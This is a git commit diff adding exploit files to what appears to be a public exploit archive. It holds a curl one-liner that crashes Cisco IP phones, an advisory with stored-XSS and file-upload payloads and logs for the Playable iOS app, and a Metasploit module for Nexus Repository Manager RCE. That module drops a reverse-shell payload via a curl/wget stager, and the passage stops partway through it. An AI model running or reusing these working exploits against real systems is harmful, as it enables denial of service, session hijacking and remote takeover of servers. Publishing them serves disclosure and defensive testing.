DB: 2020-04-18
6 changes to exploits/shellcodes Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP) Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE Nexus Repository Manager - Java EL Injection RCE (Metasploit) Playable 9.18 iOS - Persistent Cross-Site Scripting TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection Cisco IP Phone 11.7 - Denial of service (PoC)
This commit is contained in:
parent
c3e827f657
commit
189c8b52c9
7 changed files with 1252 additions and 0 deletions
13
exploits/hardware/webapps/48342.txt
Normal file
13
exploits/hardware/webapps/48342.txt
Normal file
|
@ -0,0 +1,13 @@
|
||||||
|
# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-04-15
|
||||||
|
# Exploit Author: Jacob Baines
|
||||||
|
# Vendor Homepage: https://www.cisco.com
|
||||||
|
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
|
||||||
|
# Version: Before 11.7(1)
|
||||||
|
# Tested on: Cisco Wireless IP Phone 8821
|
||||||
|
# CVE: CVE-2020-3161
|
||||||
|
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
|
||||||
|
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
|
||||||
|
|
||||||
|
curl -v --path-as-is --insecure
|
||||||
|
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
423
exploits/ios/webapps/48340.txt
Normal file
423
exploits/ios/webapps/48340.txt
Normal file
|
@ -0,0 +1,423 @@
|
||||||
|
# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting
|
||||||
|
# Author: Vulnerability Laboratory
|
||||||
|
# Date: 2020-04-15
|
||||||
|
# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Playable v9.18 iOS - Multiple Web Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
https://www.vulnerability-lab.com/get_content.php?id=2198
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2020-04-16
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
2198
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
7.3
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Class:
|
||||||
|
====================
|
||||||
|
Multiple
|
||||||
|
|
||||||
|
|
||||||
|
Current Estimated Price:
|
||||||
|
========================
|
||||||
|
1.000€ - 2.000€
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
|
||||||
|
Touch without conversion -
|
||||||
|
just copy files to your device through iTunes or over Wifi! To search
|
||||||
|
for closed captions /
|
||||||
|
subtitles select a video then press the magnifying glass icon to the top
|
||||||
|
right of the video.
|
||||||
|
|
||||||
|
(Copy of the Homepage:
|
||||||
|
https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The vulnerability laboratory core research team discovered multiple
|
||||||
|
vulnerabilities in the official Playable v9.18 apple ios mobile application.
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Portable Ltd
|
||||||
|
Product: Playable v9.18 - iOS Mobile Web Application
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2020-04-16: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Authentication Type:
|
||||||
|
====================
|
||||||
|
Pre auth - no privileges
|
||||||
|
|
||||||
|
|
||||||
|
User Interaction:
|
||||||
|
=================
|
||||||
|
Low User Interaction
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Type:
|
||||||
|
================
|
||||||
|
Independent Security Research
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A persistent script code injection web vulnerability has been discovered
|
||||||
|
in the official Playable v9.18 apple ios mobile application.
|
||||||
|
The vulnerability allows remote attackers to inject own malicious
|
||||||
|
persistent script codes to the application-side for manipulation.
|
||||||
|
|
||||||
|
The vulnerability is located in the filename parameter of the upload
|
||||||
|
module. Attackers with wifi access are able to perform uploads
|
||||||
|
with malicious script code to manipulation the mobile application ui.
|
||||||
|
The request method to inject is POST and the attack vector of
|
||||||
|
the vulnerability is persistent. Attackers are able to inject html and
|
||||||
|
javascript codes to comrpomise the mobile wifi web-application.
|
||||||
|
The injection point is the upload form on localhost:8881 and the
|
||||||
|
execution occurs on localhost:80 with the visible ui listing.
|
||||||
|
|
||||||
|
Successful exploitation of the vulnerability results in session
|
||||||
|
hijacking, persistent phishing attacks, persistent external redirects
|
||||||
|
to malicious source and persistent manipulation of affected mobile
|
||||||
|
application modules.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Function(s):
|
||||||
|
[+] upload
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
An arbitrary file upload web vulnerability has been discovered in the
|
||||||
|
official Playable v9.18 apple ios mobile application.
|
||||||
|
The arbitary file upload vulnerability allows remote attackers to upload
|
||||||
|
malicious files to compromise the mobile application.
|
||||||
|
|
||||||
|
The vulnerability is located in the filename parameter of the upload
|
||||||
|
module. Attackers with wifi access are able to perform
|
||||||
|
uploads with malicious file extions to bypass the parse function. In a
|
||||||
|
second step the attacker requests the local file to
|
||||||
|
execute the malicious content on the local web-server. The request
|
||||||
|
method to inject is POST and the attack vector of the
|
||||||
|
vulnerability is located on the application-side. The injection point is
|
||||||
|
the upload form on localhost:8881. The execution
|
||||||
|
point becomes visible by a request the localhost:80/vid/[filename] path
|
||||||
|
with the uploaded file content. The is present
|
||||||
|
because of a missing file parse and insecure upload handling on file
|
||||||
|
extensions. As well the local web-server can be
|
||||||
|
reconfigured to provide more security on user interactions.
|
||||||
|
|
||||||
|
Successful exploitation of the arbitrary file upload vulnerability
|
||||||
|
results in a compromise of the local ios mobile application.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Function(s):
|
||||||
|
[+] upload
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] /vid/
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The persistent script code injection vulnerability can be exploited by
|
||||||
|
remote attackers with wifi network access without user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the
|
||||||
|
provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Install the ios application
|
||||||
|
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
|
||||||
|
2. Start the ios application on your local ios device
|
||||||
|
3. Start the wifi share service in the application ui
|
||||||
|
4. Open the web-browser
|
||||||
|
5. Tamper the http requests
|
||||||
|
6. Prepare to upload any file and press the upload button
|
||||||
|
7. Inject as filename any html/js script code payload
|
||||||
|
8. Continue to transmit the POST method request
|
||||||
|
9. The file executes on the index listing on port 8881
|
||||||
|
(http://localhost:8881/index.html)
|
||||||
|
10. Successful reproduce of the persistent script code injection web
|
||||||
|
vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploitation
|
||||||
|
>"<iframe src=evil.source onload=alert(document.domain)>.jpg
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session logs [POST] ---
|
||||||
|
Status: 200[OK]
|
||||||
|
POST http://localhost:8881/upload
|
||||||
|
Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8881]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
Accept[*/*]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8881/index.html]
|
||||||
|
Content-Length[8559]
|
||||||
|
Content-Type[multipart/form-data;
|
||||||
|
boundary=---------------------------3823323145734]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------3823323145734
|
||||||
|
Content-Disposition: form-data; name="file"; filename=">"<iframe
|
||||||
|
src=evil.source onload=alert(document.domain)>.jpg"
|
||||||
|
-
|
||||||
|
Status: 200[OK]
|
||||||
|
GET http://localhost/evil.source
|
||||||
|
Mime Type[application/x-unknown-content-type]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost/evil.source]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Connection[keep-alive]
|
||||||
|
Upgrade-Insecure-Requests[1]
|
||||||
|
Cache-Control[max-age=0]
|
||||||
|
Response Header:
|
||||||
|
Accept-Ranges[bytes]
|
||||||
|
Content-Length[8559]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
the arbitrary file upload vulnerability can be exploited by local
|
||||||
|
attackers with wifi network access without user interaction.
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the
|
||||||
|
provided information and steps below to continue.
|
||||||
|
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Install the ios application
|
||||||
|
(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
|
||||||
|
2. Start the ios application on your local ios device
|
||||||
|
3. Start the wifi share service in the application ui
|
||||||
|
4. Open the web-browser
|
||||||
|
5. Tamper the http requests
|
||||||
|
6. Prepare a js file with malicious test content
|
||||||
|
7. Extend the file name with .jpg
|
||||||
|
Note: The upload mechanism does not parse or checks for multiple
|
||||||
|
extensions on file uploads
|
||||||
|
8. Upload the file by pushing the Upload File button
|
||||||
|
9. Open the url in the default /vid/ folder and remove the .jpg extension
|
||||||
|
10. The simple js executes in the scripting engine when opening
|
||||||
|
11. Successful reproduce of the arbitrary file upload vulnerability!
|
||||||
|
Note: Using the ftp you can perform to create the file via console
|
||||||
|
ftp://localhost (read/write permissions)
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Exploitation
|
||||||
|
http://localhost/vid/clay.js.jpg
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session logs [POST] ---
|
||||||
|
Status: 200[OK]
|
||||||
|
POST http://localhost:8881/upload
|
||||||
|
Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8881]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
Accept[*/*]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8881/index.html]
|
||||||
|
Content-Length[86856]
|
||||||
|
Content-Type[multipart/form-data;
|
||||||
|
boundary=---------------------------3823323145733]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------3823323145733
|
||||||
|
Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
|
||||||
|
-
|
||||||
|
Status: 200[OK]
|
||||||
|
GET http://localhost/listVideosJson
|
||||||
|
Mime Type[application/x-unknown-content-type]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
Accept[application/json, text/javascript, */*; q=0.01]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
X-Requested-With[XMLHttpRequest]
|
||||||
|
Referer[http://localhost/]
|
||||||
|
Connection[keep-alive]
|
||||||
|
Response Header:
|
||||||
|
Accept-Ranges[bytes]
|
||||||
|
Content-Length[87]
|
||||||
|
-
|
||||||
|
Status: 200[OK]
|
||||||
|
GET http://localhost/vid/clay.js.jpg
|
||||||
|
Mime Type[application/iosjpg]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost/]
|
||||||
|
Connection[keep-alive]
|
||||||
|
Upgrade-Insecure-Requests[1]
|
||||||
|
Response Header:
|
||||||
|
Accept-Ranges[bytes]
|
||||||
|
Content-Length[86670]
|
||||||
|
Content-Type[application/iosjpg;]
|
||||||
|
-
|
||||||
|
Status: 200[OK]
|
||||||
|
GET http://localhost/vid/clay.js
|
||||||
|
Mime Type[application/x-unknown-content-type]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
|
||||||
|
Gecko/20100101 Firefox/52.0]
|
||||||
|
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Connection[keep-alive]
|
||||||
|
Upgrade-Insecure-Requests[1]
|
||||||
|
Response Header:
|
||||||
|
Accept-Ranges[bytes]
|
||||||
|
Content-Length[0]
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The vulnerability can be resolved by a restriction and parse of the
|
||||||
|
filename parameter. Disallow special chars and restrict inputs.
|
||||||
|
Encode also the output locations to ensure nobody is able to execute
|
||||||
|
script code in the main file listing.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
Parse the filename for multiple extensions and prevent that attackers
|
||||||
|
open specific dangerous file extensions that could
|
||||||
|
compromise the local application path.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the script code injection web vulnerability in the
|
||||||
|
mobile ios application is estimated as high.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the arbitrary file upload vulnerability in the
|
||||||
|
mobile ios application is estimated as high.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability-Lab -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||||
|
Benjamin Kunz Mejri -
|
||||||
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without
|
||||||
|
any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability
|
||||||
|
and capability for a particular purpose. Vulnerability-Lab
|
||||||
|
or its suppliers are not liable in any case of damage, including direct,
|
||||||
|
indirect, incidental, consequential loss of business profits
|
||||||
|
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||||
|
advised of the possibility of such damages. Some states do
|
||||||
|
not allow the exclusion or limitation of liability for consequential or
|
||||||
|
incidental damages so the foregoing limitation may not apply.
|
||||||
|
We do not approve or encourage anybody to break any licenses, policies,
|
||||||
|
deface websites, hack into databases or trade with stolen data.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||||
|
www.vulnerability-db.com
|
||||||
|
Services: magazine.vulnerability-lab.com
|
||||||
|
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||||
|
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||||
|
youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php
|
||||||
|
vulnerability-lab.com/rss/rss_upcoming.php
|
||||||
|
vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php
|
||||||
|
vulnerability-lab.com/register.php
|
||||||
|
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this
|
||||||
|
file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified
|
||||||
|
form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||||
|
All pictures, texts, advisories, source code, videos and other
|
||||||
|
information on this website is trademark of vulnerability-lab team & the
|
||||||
|
specific authors or managers. To record, list, modify, use or
|
||||||
|
edit our material contact (admin@ or research@) to get a ask permission.
|
||||||
|
|
||||||
|
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||||
|
Security GmbH]™
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
196
exploits/linux/remote/48343.rb
Executable file
196
exploits/linux/remote/48343.rb
Executable file
|
@ -0,0 +1,196 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::Remote::AutoCheck
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Nexus Repository Manager Java EL Injection RCE',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a Java Expression Language (EL) injection in Nexus
|
||||||
|
Repository Manager versions up to and including 3.21.1 to execute code
|
||||||
|
as the Nexus user.
|
||||||
|
|
||||||
|
This is a post-authentication vulnerability, so credentials are required
|
||||||
|
to exploit the bug. Any user regardless of privilege level may be used.
|
||||||
|
|
||||||
|
Tested against 3.21.1-01.
|
||||||
|
},
|
||||||
|
'Author' => [
|
||||||
|
'Alvaro Muñoz', # Discovery
|
||||||
|
'wvu' # Module
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
['CVE', '2020-10199'],
|
||||||
|
['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
|
||||||
|
['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '2020-03-31', # Vendor advisory
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
|
||||||
|
'CmdStagerFlavor' => %i[curl wget],
|
||||||
|
'Notes' => {
|
||||||
|
'Stability' => [CRASH_SAFE],
|
||||||
|
'Reliability' => [REPEATABLE_SESSION],
|
||||||
|
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
|
||||||
|
}
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
Opt::RPORT(8081),
|
||||||
|
OptString.new('TARGETURI', [true, 'Base path', '/']),
|
||||||
|
OptString.new('USERNAME', [true, 'Nexus username', 'admin']),
|
||||||
|
OptString.new('PASSWORD', [true, 'Nexus password'])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def post_auth?
|
||||||
|
# Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
|
||||||
|
true
|
||||||
|
end
|
||||||
|
|
||||||
|
# Send a GET / request to the server, check the response for a Server header
|
||||||
|
# containing the Nexus version, and then check if it's a vulnerable version
|
||||||
|
def check
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path)
|
||||||
|
)
|
||||||
|
|
||||||
|
unless res
|
||||||
|
return CheckCode::Unknown('Target did not respond to check request.')
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.headers['Server']
|
||||||
|
return CheckCode::Unknown('Target did not respond with Server header.')
|
||||||
|
end
|
||||||
|
|
||||||
|
# Example Server header:
|
||||||
|
# Server: Nexus/3.21.1-01 (OSS)
|
||||||
|
version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
|
||||||
|
|
||||||
|
unless version
|
||||||
|
return CheckCode::Unknown('Target did not respond with Nexus version.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
|
||||||
|
return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
# NOTE: Automatic check is implemented by the AutoCheck mixin
|
||||||
|
super
|
||||||
|
|
||||||
|
print_status("Executing command stager for #{datastore['PAYLOAD']}")
|
||||||
|
|
||||||
|
# This will drop a binary payload to disk and execute it!
|
||||||
|
execute_cmdstager(
|
||||||
|
noconcat: true,
|
||||||
|
cookie: login(datastore['USERNAME'], datastore['PASSWORD'])
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def login(username, password)
|
||||||
|
print_status("Logging in with #{username}:#{password}")
|
||||||
|
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path,
|
||||||
|
'/service/rapture/session'),
|
||||||
|
'vars_post' => {
|
||||||
|
'username' => Rex::Text.encode_base64(username),
|
||||||
|
'password' => Rex::Text.encode_base64(password)
|
||||||
|
},
|
||||||
|
'partial' => true # XXX: Return partial response despite timeout
|
||||||
|
}, 3.5)
|
||||||
|
|
||||||
|
unless res
|
||||||
|
fail_with(Failure::Unknown, 'Target did not respond to login request')
|
||||||
|
end
|
||||||
|
|
||||||
|
cookie = res.get_cookies
|
||||||
|
|
||||||
|
unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
|
||||||
|
fail_with(Failure::NoAccess, 'Could not log in with specified creds')
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("Logged in with #{cookie}")
|
||||||
|
cookie
|
||||||
|
end
|
||||||
|
|
||||||
|
# This is defined so that CmdStager can use it!
|
||||||
|
def execute_command(cmd, opts = {})
|
||||||
|
vprint_status("Executing command: #{cmd}")
|
||||||
|
|
||||||
|
res = send_request_cgi(
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path,
|
||||||
|
'/service/rest/beta/repositories/go/group'),
|
||||||
|
# HACK: Bypass CSRF token with random User-Agent header
|
||||||
|
'agent' => rand_text_english(8..42),
|
||||||
|
'cookie' => opts[:cookie],
|
||||||
|
'ctype' => 'application/json',
|
||||||
|
'data' => json_payload(cmd)
|
||||||
|
)
|
||||||
|
|
